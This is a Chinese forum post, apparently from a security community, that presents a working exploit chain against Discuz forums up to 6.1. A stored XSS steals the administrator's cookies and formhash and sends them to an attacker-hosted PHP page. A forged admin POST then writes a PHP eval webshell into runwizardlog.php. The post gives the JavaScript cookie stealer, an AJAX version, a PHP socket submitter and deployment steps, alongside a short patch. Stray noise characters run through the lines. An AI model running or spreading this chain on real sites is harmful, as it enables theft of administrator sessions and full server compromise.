找回密码
 立即注册
查看: 4498|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell
2 ^! T' b/ X2 t7 d$ HBy racle @tian6.com1 b7 I5 U3 O' j8 p. C# {8 M
欢迎转帖.但请保留版权信息.# k% Q4 `/ L$ L0 x1 |& p* e* o/ e
受影响版本iscuz<=6.1.0,gbk+utf+big5: w$ R) _. N$ g. h/ M: _- X

+ @, Y8 d. N5 h新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
+ _3 W0 K& m7 g: Y: u  v. \1 W3 Z# `4 J  M$ E  [- v7 o

  n2 T' t& n* a/ E) Q+ L* y3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706- l7 K) J1 e3 d" y
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.$ C8 ]/ U2 G1 ?0 P7 U9 E

/ D# e3 J# x9 H$ Q- b, N, U分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..) e1 o- J8 J( X, a3 K9 i2 O5 P4 u- Q
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
, m5 u' v1 R* O/ w1 r/ q' |6 q! [6 a9 g) A, o+ G" q$ t0 p
9 [; q7 T! `7 e# p) Q
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
3 J9 H% S6 @% N) q$ q6 L7 U% j1 }9 @5 w% L2 r2 B# \' ^" [
9 y$ h: N4 d" _0 f
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.& i! u' W+ q5 S) S' B  E
) r, i! V* H% O) U. M
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.# R2 M7 ?4 m" ~% N
* X8 J8 B  `9 f" o- Q
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
! k8 M" P* k' W, u0 P6 [+ b3 k+ i9 u
% E5 @) K/ ?( o1 |5 \/ q
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
9 p3 H& ^) q! W9 f$ l+ l  c; w6 ]
, g& L0 A% y; C. x        global $runwizardfile, $runwizardhistory;
+ W; ]& e+ P% h4 B
+ W$ \3 H. ]  ~: V        $fp = fopen($runwizardfile, 'w');
1 H8 a6 w: O9 S. B! X" r$ I, R! K8 m# L) M$ l' b3 \6 G
        fwrite($fp, serialize($runwizardhistory));
0 f$ j- h+ K) B0 r4 n6 H: |. {4 z3 o4 `# u
        fclose($fp);/ e' a* B  U0 \" i4 Q

- U3 `3 f5 M( o! H1 _}* ]+ {* I3 L7 o9 b
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
' T$ q' j+ l. z3 l4 r' I以下是修补的办法:function saverunwizardhistory() {6 ]% q1 q* W3 @! a
, R# \- J$ Z' C2 K8 O6 g. B
        global $runwizardfile, $runwizardhistory;
8 `3 P) @; f; t% {% R9 `- L" \" n. t  I' ]# v
        $fp = fopen($runwizardfile, 'w');6 t: A' j: t( {$ t- [+ }: P
0 y( x+ }3 T8 v& B; ?
        $s = '<?php exit;?>';
- R& R. J9 B( F/ z6 l0 x! _3 [
7 F; [& d4 i6 S        $s .= serialize($runwizardhistory);# `6 F6 g7 D6 Z8 b5 n
$ N. R/ e1 Z9 N) u" [1 t4 K
        fwrite($fp, $s);/ `- @0 z# }. R) U4 D/ G. v
7 t3 Q9 C" [/ L! ~% a6 v! v5 l0 m# ?
        fclose($fp);% N. x& S' g& _- Q) }1 J7 m( q: g2 {

& c% s/ S) Z# x. H. U, @: o}
0 y: P' S. g! Z& x( B1 h" {9 B: w复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.' z' [( J, @8 @0 b* {: W

2 F+ i- s$ v6 }; y9 \6 ~
/ `+ e9 D5 ]" f7 h! k
/ H9 l! Y3 R5 }! P, p( O+ H# ~----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------4 {' S7 P- p. ?- t7 ~7 g& ]! |4 @
& T1 E& P$ ?+ R

; Y0 r8 n1 a* c% D  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
4 d/ ~6 E" x3 _! H- s0 P4 A. U: ]; k# V! b
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
8 u9 ?9 z2 k# D0 s+ i: k# e: c- S
- P. x( @0 i5 x9 T& N/ P1 V这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
- B" ~& M" v$ p" ~# Q! T1 n3 r* h( `
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:/ [6 J& ^, _7 o) F' _! y* f
' z4 L9 F+ b' G9 K! P+ X
var url="http://目标网站/admincp.php";      6 ~0 W2 s, K. y0 R# _

6 T% Q# ]+ V" [/*获得cookies*/
7 q" B; O( g) {* N# k
5 K; Z5 E; |1 }6 f4 }3 rfunction getURL(s) {
6 v' B6 {1 I3 ?# f  a& g
9 N1 R& O' I  Q$ I# Q/ _0 K6 kvar image = new Image();1 }6 w+ i% U3 f8 g' }' ?

4 l3 u1 J; A3 N% ]/ A* K6 x: Y0 U7 iimage.style.width = 0;& }+ I; i! C' J" J# Z( c) u( w

2 c" N! T& A- ~/ n) F- I8 m4 j5 X4 c$ iimage.style.height = 0;1 c* C2 T- v( Y" ^- M
4 q5 t6 @5 l( j3 r1 ~3 |& h+ J
image.src = s;
* n! d7 ]9 h, u" l0 k2 T/ m* e; B# L9 `6 @0 |
}/ ^: Z. l5 ]: V- E6 H/ J9 n
1 v' Z2 V0 o+ O- ]
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php4 k, \6 W7 \6 C% Y
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];' C! [3 G- r# N# m; w; O
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
: Q* S: J/ C0 `0 t8 t
4 p) d% K" X/ d- \5 ?
; l# o6 z/ g  i7 d获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
' Q& {: A$ ]4 ^: F: x' u, Z) `' M6 A- g" r+ I. @

9 o8 B  Q. ]" i1 y( W" M6 t6 H2 l" k- N2 E0 \$ g+ w6 y% U
/*hash*/
  }5 }# o6 V1 m3 S" U. L8 o1 K( Z& c& Z6 n7 M
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");( \6 ^" g' G6 X6 C" i/ d

0 h$ u, X0 |7 CxmlHttpReq.open("GET", url+"admincp.php?action=home", false);
1 Q6 `- B8 D+ T9 }/ ]3 d
/ C& [) n/ C/ T$ c' c. D9 KxmlHttpReq.send();. Y9 A' a+ U7 L" A7 k: G0 g- q

8 q. b; o  `6 \( Kvar resource = xmlHttpReq.responseText;( r8 G5 x4 n) E* ~
' o1 y) V& A$ I/ u# ~4 g( A: _  [
var numero = resource.search(/formhash/);
+ A4 c6 f. P$ i$ u! z7 _9 G# G) R  H
var formhash=encodeURIComponent(resource.substr(numero+17,8));1 d2 @1 W7 }! m9 ?& L

: K! Y+ @$ @8 L: `7 E2 }. A$ m  O: J$ H  _

0 t" s7 h& I# ?var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据   s' J6 d. R! D& j4 t3 e- P) U

2 h! [, d5 [0 s& x6 ]+ {6 [1 e( ZxmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
6 p7 }; n- z) g+ Y' O3 i: U* [$ B9 \
; X  n+ h" f9 ]. ZxmlHttpReq.setRequestHeader("Referer", url);
7 s% ?# J, y9 V; a" q9 n, j3 p+ c$ r. ]; G
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");$ D% M. w  @. Y4 p9 s1 v6 J: ~6 s
2 E" l7 A% W7 I! W- \! T2 V
xmlHttpReq.setrequestheader("content-length",post.length);
8 m( C$ D0 W$ c% i# C% |! Z2 W$ d% v" W
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); * m5 S: {3 D- W7 o
- \/ \$ W3 H- S* c" w" K. h
xmlHttpReq.send(post);//发送数据% I  L: n7 E9 s- W" f- P% }: Z
复制代码这里HASH我假设正确,这样提交,也无须cookies$ D8 f6 ~% U7 g1 K& Q- G3 ~

6 Y8 o& j* R# X再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);5 D8 p' o5 c/ }  ^  k  R/ p4 l

# s* S9 D$ R0 S- f5 Q$ f2 Pif (!$sock) die("$errstr ($errno)\n");' e4 {' T$ c+ P- x- A
: _7 l( _* x, M# w' O+ [
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';- n4 u9 Y' i1 r! ]' I! K1 M% k1 J2 |6 U

# q, V+ F) v# y3 b8 g3 A4 F4 Y7 B* d$ p0 @/ v: P, B

; X1 p% _, q$ g9 lfwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
  X2 J$ v# A( }. X- X+ V# [5 U1 s, E7 b- t6 Q2 [  b
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
( f: U4 r8 v8 n& p/ `8 Y7 \' _/ I" L% i" Z, ~( k0 i
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
: [- y+ k  X2 Z8 c- N8 ~4 z9 T8 H$ e: y8 a5 ^
fwrite($sock, "Accept-Language: zh-cn\r\n");
; }8 E3 L8 t8 ^  r: {0 K: z
/ j: G- V7 z2 l7 Efwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");: ?; n8 V6 J' e0 K2 c

' ?( X6 t+ R, q6 z- ?+ S$ U/ Qfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");# f3 f6 D9 z% \' d, i- M9 G

. g7 k# H% C5 D# u* T2 b; mfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
6 g. h2 S1 V' X0 i* P# T: N, h5 w* t1 L0 B7 N5 x5 Q- r- f) ~2 g
fwrite($sock, "Host: $url\r\n");0 |0 c  r  _- M3 Z
2 p4 |' X5 D& }4 m
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
2 u$ _! E; M5 t. k! x6 T/ R* V7 S. o  \0 }1 N% r" Z, x+ g5 v
fwrite($sock, "Connection: Keep-Alive\r\n");5 a; e9 m2 w: m. H

, B2 ?, R. V6 lfwrite($sock, "Cache-Control: no-cache\r\n");# s' r% m- C- l! [
% Y; e  y/ S$ Q, P. w, @0 b1 c
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
1 e0 C- ~2 t) O( m8 @% n( S+ ]! b: t; |, F$ b! s
fwrite($sock, $data);/ i2 ]7 l0 T( N1 x6 c5 k- S6 S

; m8 [' K% C" p0 b6 Y/ N0 U9 T. ~' C0 D+ h7 C/ p7 m

: H- ?/ V1 X! s  a7 m9 T* Z$ N$headers = "";% p1 y1 b) z3 u5 A6 Q+ d

1 ]  {0 n4 w( Z& w# qwhile ($str = trim(fgets($sock, 4096)))
" ^6 P8 p5 E3 ]7 t, _
0 p" j9 J3 G6 u     $headers .= "$str\n";8 I8 P6 O% P6 g) K- \

5 L& T+ p% ~$ B' a1 Aecho "\n";" v4 E( T: n7 k% a
2 L: @: u8 T. r$ F8 N, g
$body = "";
( n5 j( r& |0 a- [. O2 ]- `5 g* u% U) D( I5 `4 p2 `  q3 n
while (!feof($sock))5 V  V6 i' j/ X& N) J# w

+ I, F; z) R+ v9 ^5 d* ~9 }     $body .= fgets($sock, 4096);
* G; b% Z+ d" e. n* X2 l
2 Y' ?* r7 J& R; efclose($sock);* ~; @% W. K; o- O5 H
* f0 e% h" {: G" @, S! k& D+ Y
echo $body;
/ K% k- _0 V* k0 z" I9 ?* U; ]& ^复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^9 \9 s* k* ~) G+ W# d( A3 Q

% `/ _/ S  v. A9 Q; G/ J
; D' Q  o/ c! e1 [& S0 e-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------7 x! M# {% H8 Y& _- S' K3 @* z( c
6 i, H0 D' C1 d/ L6 V

, d1 _) e4 ^$ p. e1HP SOCKET利用方法首先打开racle.js
. L; ^2 H, K) m. C/ i" V& c
9 J/ c6 g5 ]* u: t8 t$ c0 [var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
" ~1 m# H; H) d$ s4 X* u4 r
  w) G3 H& Q* g1 Y+ G. ^9 c/ ]* @
! C+ _4 S+ M" I  o1 t5 M$ ]2 i  f. Z! g: s% p& O* i+ X
然后打开racle@tian6.php
( q# T2 ^: q% N( }3 g+ Z
; X: P9 g' Z: I6 ~3 D4 S* l2 _$ e- ]$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
1 o7 Z4 ?4 ~& c& D# z1 f* Q
+ G9 Z& c" E, x+ u9 N! ], g) d
; l8 w* u/ R2 g) F1 x& d8 w  I3 \* h+ N& U7 D8 Y
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:+ _4 t6 b! J9 Q! x0 l/ S
% m) h: Y- f$ y8 _5 y+ @7 E
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));; o1 T3 j" {  ?1 U- C% x4 y
, I1 j; U* n% c1 O, c3 k( e
( H  T! r0 Q: x, ~; }/ R

( m, R: ?8 o5 H! {# b9 TgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));% i3 }& \5 E) m/ D7 _% @7 e- f
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址., H" Z& F6 m+ w# D! o

/ p  X5 e* e$ ?
: N( V( A. ~  v8 e% e. D3 }2 J  T
  A% B4 p1 a$ u& l9 A2 _如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
/ N' a, q8 ~$ C1 s) s5 w1 T6 u9 i) C! X, L  g
var formhash=encodeURIComponent(resource.substr(numero+17,8));
, ]6 P6 J3 c( E5 X1 |
5 t$ w0 R3 D# \3 V7 z8 k' a3 d7 r7 d; R9 ~4 b% g3 u
: b3 E5 a  D& V8 U) ?" b/ d! Q
var formhash=encodeURIComponent(resource.substr(numero+9,8));
$ A* U% T; Y; s* C复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.2 I  [1 s) v7 `6 i# ~6 v
; f  Z+ M$ i) C6 e4 L/ H8 t1 G
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
3 p( u4 [) _+ ~, j9 w" d, ?, W  Z9 h8 s
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.# R/ ?' W* J  z6 `' h1 o) i
; ^9 }: Y' ^  f5 d+ g
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧./ h; v% M9 j. P5 e3 o# N
/ }3 y4 S3 P+ S- P& A3 V5 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表